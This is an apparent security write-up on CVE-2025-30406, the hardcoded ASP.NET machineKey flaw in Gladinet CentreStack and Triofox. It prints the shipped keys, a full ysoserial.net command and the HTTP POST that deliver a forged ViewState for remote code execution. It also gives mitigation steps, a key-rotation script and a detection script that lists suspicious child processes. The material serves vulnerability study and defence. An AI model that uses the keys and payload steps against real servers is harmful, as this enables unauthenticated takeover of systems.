
CVE-2025-30406 PoC: Gladinet CentreStack security vulnerability

Associated Vulnerability
Title: Gladinet CentreStack security vulnerability (CVE-2025-30406)
Description: Gladinet CentreStack is a mobile-access and secure file-sharing product from the US company Gladinet that provides self-hosted cloud storage. CentreStack contains a security vulnerability caused by a hardcoded machineKey, which turns ASP.NET's ViewState handling into an insecure deserialization flaw and may allow remote code execution.
Readme
# CVE-2025-30406: CentreStack/Triofox Deserialization RCE

*A technical analysis of the critical insecure deserialization vulnerability in CentreStack and Triofox, caused by a hardcoded `machineKey`.*


-----

## 📚 Table of Contents

  * 📝 Vulnerability Details
  * 📖 Description
  * 🔬 Technical Root Cause
      * The Core Concept: The Universal Master Key
      * The Culprit: Hardcoded `machineKey`
  * 💥 The Attack Chain
  * 🐍 Conceptual Exploit Logic
  * 🛡️ Mitigation and Defense
  * ⚠️ Disclaimer

-----

## 📝 Vulnerability Details

| Detail | Value |
| :--- | :--- |
| **CVE ID** | `CVE-2025-30406` |
| **Severity** | **Critical** |
| **CVSS v3.1 Score** | `9.8` |
| **CVSS Vector** | `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` |
| **Affected Software**| CentreStack & Triofox |
| **Impact** | Unauthenticated Remote Code Execution (RCE) |

## 📖 Description

**CVE-2025-30406** is a critical **insecure deserialization** vulnerability in Gladinet's CentreStack and Triofox. It stems from a **static, hardcoded `machineKey`** in the applications' `web.config`. ASP.NET uses this key to sign (and, when configured, encrypt) data that it later deserializes, most importantly `ViewState`, and it deserializes that data only after the signature has been verified.

Because the key is **identical across default installations**, an unauthenticated attacker who has read it from any copy of the software can produce a `ViewState` blob that carries a valid signature. The server accepts the signature, decrypts the blob and deserializes it, which yields **Remote Code Execution (RCE)** in the security context of the IIS worker process, reported as `SYSTEM` on affected deployments. The vulnerability has been exploited in the wild.

-----

## 🔬 Technical Root Cause

### The Core Concept: The Universal Master Key

> Imagine a housing developer builds thousands of homes and gives every single homeowner the **exact same master key**. This key can open not only the front door but also a special "maintenance panel" inside the house.
>
> An attacker simply needs to get a copy of this key from any one of the houses. With it, they can walk up to any other house built by that developer, unlock the door, open the maintenance panel, and take control of the house's electrical and plumbing systems.

This is precisely the situation with CVE-2025-30406. The `machineKey` is the universal master key.

### The Culprit: Hardcoded `machineKey`

In ASP.NET applications the `<machineKey>` element in `web.config` configures the keys that protect framework-generated data against tampering and disclosure:

  * **`validationKey`**: keys the MAC (HMAC) computed over `ViewState`, forms-authentication tickets and similar tokens, so the server can detect any modification.
  * **`decryptionKey`**: keys the symmetric cipher (AES here) used to encrypt those same tokens when encryption is enabled.

When the element is omitted, ASP.NET auto-generates keys per machine. The problem arises when a vendor ships fixed values, so that every installation shares them.

The vulnerability exists because CentreStack and Triofox shipped with the following **hardcoded keys** in their `web.config` files:

```xml
<machineKey validationKey="A61B55E9EAC2382A06346BE5BE46485048995323" 
            decryptionKey="A61B55E9EAC2382A06346BE5BE46485048995323" 
            validation="SHA1" decryption="AES" />
```

Any attacker who knows these default keys can forge a trusted payload. The server, seeing a perfectly valid signature and being able to decrypt the content, has no reason to distrust the object it is about to deserialize.

-----

## 💥 The Attack Chain

1.  **Obtain the Key:** The attacker already knows the hardcoded `validationKey` and `decryptionKey` from public disclosures or by simply downloading the software.

2.  **Generate a Payload:** The attacker uses a tool like **`ysoserial.net`** to generate a malicious serialized payload. This payload is a specially crafted object that, when deserialized, will execute an OS command (e.g., launch PowerShell to download and run a script). The tool uses the hardcoded keys to sign and encrypt this payload, making it look legitimate.

3.  **Identify a Target Endpoint:** The attacker picks any `.aspx` page of the application that round-trips `ViewState`; the login page qualifies and requires no credentials. From that page the attacker reads the `__VIEWSTATEGENERATOR` hidden field, which the payload generator must match.

4.  **Deliver and Execute:** The attacker sends an HTTP request to the target endpoint, replacing the legitimate `__VIEWSTATE` parameter with their malicious, encrypted payload. The ASP.NET framework on the server performs the following:

      * Checks the payload's signature using the `validationKey`. It matches.
      * Decrypts the payload using the `decryptionKey`. It succeeds.
      * **Deserializes the now-trusted object**, triggering the embedded code and achieving RCE.

-----

## 🐍 Conceptual Exploit Logic

An attacker does not need to write complex code; exploitation is driven from the command line with `ysoserial.net`.

**Step 1: Generate the malicious `ViewState` payload.**

The attacker creates a payload that will execute `calc.exe` on the target server. `-g` selects the deserialization gadget, `--generator` is the target page's `__VIEWSTATEGENERATOR` value (`B3585145` is the example value used here), and `--path`/`--apppath` are the alternative way to derive that value when the hidden field is not present. `--decryptionalg`/`--validationalg` must match the `decryption`/`validation` attributes of the server's `<machineKey>`.

```bash
# Generates an encrypted and signed __VIEWSTATE payload using the known hardcoded keys.
# Run on Windows where ysoserial.net.exe is installed.
ysoserial.net.exe -p ViewState -g TextFormattingRunProperties -c "calc.exe" --generator="B3585145" --validationkey="A61B55E9EAC2382A06346BE5BE46485048995323" --decryptionkey="A61B55E9EAC2382A06346BE5BE46485048995323" --path="/portal/exploit.aspx" --apppath="/portal/" --decryptionalg="AES" --validationalg="SHA1"
```

**Step 2: Send the payload to the server.**

The attacker URL-encodes the `ysoserial.net` output and sends it as the `__VIEWSTATE` form parameter in an HTTP POST to a vulnerable page, along with the matching `__VIEWSTATEGENERATOR` value.

```http
POST /portal/login.aspx HTTP/1.1
Host: vulnerable-server.com
Content-Type: application/x-www-form-urlencoded

__VIEWSTATE=<URL-encoded_ysoserial_output>&__VIEWSTATEGENERATOR=B3585145&...
```

The server validates the MAC, decrypts and deserializes the payload, and `calc.exe` runs in the security context of the IIS worker process (`w3wp.exe`) hosting the application, which the description above identifies as `SYSTEM`. No response body is required for the command to run; the process is created during deserialization, before the page renders.

-----

## 🛡️ Mitigation and Defense

  - **🥇 Change the `machineKey` (Immediate Action):** Replace the hardcoded values in every `web.config` that defines a `<machineKey>` with unique, randomly generated keys. Generate them locally (PowerShell, or the Machine Key feature in IIS Manager); never take keys from an online generator, since a key a third-party site has seen is no better than a hardcoded one. Rotating the key invalidates the attacker's "master key" and every payload built with it. Note that the key change does not remove the deserialization sink itself; it removes the attacker's ability to reach it with a trusted payload.

  - **⚙️ Apply Vendor Patches:** Gladinet has released patches for CentreStack and Triofox. Applying these updates is essential as they may contain other security fixes in addition to addressing the `machineKey` issue.

  - **🧱 Network Segmentation:** Do not expose CentreStack/Triofox management interfaces directly to the internet if possible. Place them behind a VPN and restrict access to trusted IPs.

  - **🔎 Monitor and Detect:** Look for `w3wp.exe` (the IIS worker process) spawning `cmd.exe`, `powershell.exe` or other unexpected children, which is how a deserialized payload executes. After the key has been rotated, ASP.NET writes Event ID 1316 ("Viewstate verification failed") to the Application log whenever a client submits `ViewState` signed with the old key, so a burst of those events is a strong sign of continued exploitation attempts. Finally, compare every `web.config` on the host against the hardcoded value above to confirm no copy was missed.
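The key rotation described in the first item, as an added PowerShell example written for this write-up (it is not Gladinet's tooling or the README author's code). It assumes the product is installed under the `$InstallRoot` path given below, which is a guess to be adjusted, and that the vendor default to look for is the value quoted in this document. Without `-Apply` the script only reports which `web.config` files still carry the hardcoded key; with `-Apply` it backs each file up and writes freshly generated keys.

```powershell
# Added example for this write-up: audit and rotate <machineKey> in every web.config
# under the CentreStack/Triofox install root. Not vendor code.
# Run in an elevated PowerShell. Without -Apply it is read-only.
param(
    [string]$InstallRoot = 'C:\Program Files (x86)\Gladinet Cloud Enterprise',  # assumed path; adjust
    [switch]$Apply
)

# Hardcoded value disclosed for CVE-2025-30406; any web.config still carrying it is exposed.
$KnownBadKey = 'A61B55E9EAC2382A06346BE5BE46485048995323'

# Cryptographically random key, upper-case hex as <machineKey> expects it.
function New-HexKey {
    param([Parameter(Mandatory)][int]$Bytes)
    $buf = New-Object byte[] $Bytes
    $rng = [System.Security.Cryptography.RandomNumberGenerator]::Create()
    $rng.GetBytes($buf)
    return ($buf | ForEach-Object { $_.ToString('X2') }) -join ''
}

# Generate once and reuse for every web.config on this server. Nodes of a web farm that must
# share forms-authentication tickets need the same key too, just not the vendor's.
$NewValidationKey = New-HexKey -Bytes 64   # 64 bytes: the maximum ASP.NET accepts; fine for HMACSHA256
$NewDecryptionKey = New-HexKey -Bytes 32   # 32 bytes: AES-256

Get-ChildItem -Path $InstallRoot -Filter web.config -Recurse -ErrorAction SilentlyContinue |
  ForEach-Object {
    $path = $_.FullName
    $xml  = New-Object System.Xml.XmlDocument
    $xml.PreserveWhitespace = $true
    $xml.Load($path)

    # <machineKey> normally sits under <system.web> but may be inside a <location> block,
    # so search the whole document rather than one fixed path.
    $nodes = $xml.SelectNodes('//machineKey')
    if ($nodes.Count -eq 0) { return }   # acts as "continue" inside ForEach-Object

    $changed = $false
    foreach ($mk in $nodes) {
        $exposed = ($mk.GetAttribute('validationKey') -eq $KnownBadKey) -or
                   ($mk.GetAttribute('decryptionKey') -eq $KnownBadKey)
        $status = if ($exposed) { 'EXPOSED (vendor default key)' } else { 'custom key present' }
        Write-Output ("{0}: {1}" -f $path, $status)

        if ($Apply) {
            $mk.SetAttribute('validationKey', $NewValidationKey)
            $mk.SetAttribute('decryptionKey', $NewDecryptionKey)
            $mk.SetAttribute('validation',    'HMACSHA256')
            $mk.SetAttribute('decryption',    'AES')
            $changed = $true
        }
    }

    if ($changed) {
        Copy-Item -Path $path -Destination ("{0}.bak-{1}" -f $path, (Get-Date -Format 'yyyyMMddHHmmss'))
        $xml.Save($path)
        Write-Output ("  rewrote <machineKey> in {0}" -f $path)
    }
  }

# Saving web.config restarts the ASP.NET application, so every existing ViewState blob and
# forms-authentication ticket, including anything built with the old key, stops validating.
```

Run it once without `-Apply` to see which files match the disclosed key, then with `-Apply` after taking note of the backups it creates. Switching `validation` to `HMACSHA256` is a deliberate hardening over the shipped `SHA1`; if a component of the product is found to require `SHA1`, keep the new random keys and change only that attribute back.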

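The process-ancestry check from the last item, as an added PowerShell example written for this write-up (not part of the original README). It works on Sysmon Event ID 1 (ProcessCreate) records and flags children that a CentreStack/Triofox IIS worker has no normal reason to launch; the sample records at the bottom are constructed for an offline dry run, not real telemetry, and the list of suspicious child names is an assumption to tune for your environment.

```powershell
# Added example for this write-up: flag processes spawned by w3wp.exe, which is where a
# deserialized ysoserial.net payload executes. Not vendor code.

# Children an IIS worker hosting CentreStack/Triofox should never spawn (assumed list; tune it).
$SuspiciousChildren = @('cmd.exe', 'powershell.exe', 'pwsh.exe', 'cscript.exe', 'wscript.exe',
                        'mshta.exe', 'rundll32.exe', 'certutil.exe', 'bitsadmin.exe', 'calc.exe')

# Core decision: parent is the IIS worker and the child is on the list. Paths are reduced to
# their file name and lower-cased so C:\Windows\System32\inetsrv\w3wp.exe and W3WP.EXE both match.
function Test-W3wpSpawn {
    param(
        [Parameter(Mandatory)][string]$ParentImage,
        [Parameter(Mandatory)][string]$Image
    )
    $parentLeaf = [System.IO.Path]::GetFileName($ParentImage).ToLowerInvariant()
    $childLeaf  = [System.IO.Path]::GetFileName($Image).ToLowerInvariant()
    return ($parentLeaf -eq 'w3wp.exe') -and ($SuspiciousChildren -contains $childLeaf)
}

# Pull the fields we need out of a Sysmon EID 1 record. Sysmon writes them as
# <Data Name="ParentImage">...</Data> etc. under <EventData>.
function Get-SysmonProcessCreate {
    param([Parameter(Mandatory)][System.Diagnostics.Eventing.Reader.EventRecord]$Event)
    $x = [xml]$Event.ToXml()
    $data = @{}
    foreach ($d in $x.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
    [pscustomobject]@{
        Time        = $Event.TimeCreated
        User        = $data['User']
        ParentImage = $data['ParentImage']
        Image       = $data['Image']
        CommandLine = $data['CommandLine']
    }
}

# Constructed sample records (not real telemetry) so the logic can be exercised offline.
$samples = @(
    [pscustomobject]@{ ParentImage = 'C:\Windows\System32\inetsrv\w3wp.exe'; Image = 'C:\Windows\System32\cmd.exe';  CommandLine = 'cmd.exe /c powershell -enc ...' },
    [pscustomobject]@{ ParentImage = 'C:\Windows\System32\inetsrv\w3wp.exe'; Image = 'C:\Windows\System32\calc.exe'; CommandLine = 'calc.exe' },
    [pscustomobject]@{ ParentImage = 'C:\Windows\explorer.exe';               Image = 'C:\Windows\System32\cmd.exe';  CommandLine = 'cmd.exe' }
)
$samples | Where-Object { Test-W3wpSpawn -ParentImage $_.ParentImage -Image $_.Image }

# Live use: the same test over the last 24 hours of Sysmon process-creation events.
# Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1; StartTime = (Get-Date).AddDays(-1) } |
#     ForEach-Object { Get-SysmonProcessCreate $_ } |
#     Where-Object { Test-W3wpSpawn -ParentImage $_.ParentImage -Image $_.Image }
```

Of the three constructed records only the two whose parent is `w3wp.exe` are returned. Without Sysmon, Security Event ID 4688 carries the same parent/child relationship in its `Creator Process Name` and `New Process Name` fields once process-creation auditing is enabled, and the same `Test-W3wpSpawn` check applies to those values.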
-----

## ⚠️ Disclaimer

This document is for **educational and research purposes only**. The information provided is intended to help security professionals and developers understand and defend against this type of vulnerability. Unauthorized attacks on computer systems are illegal. Always obtain explicit permission before conducting any security testing.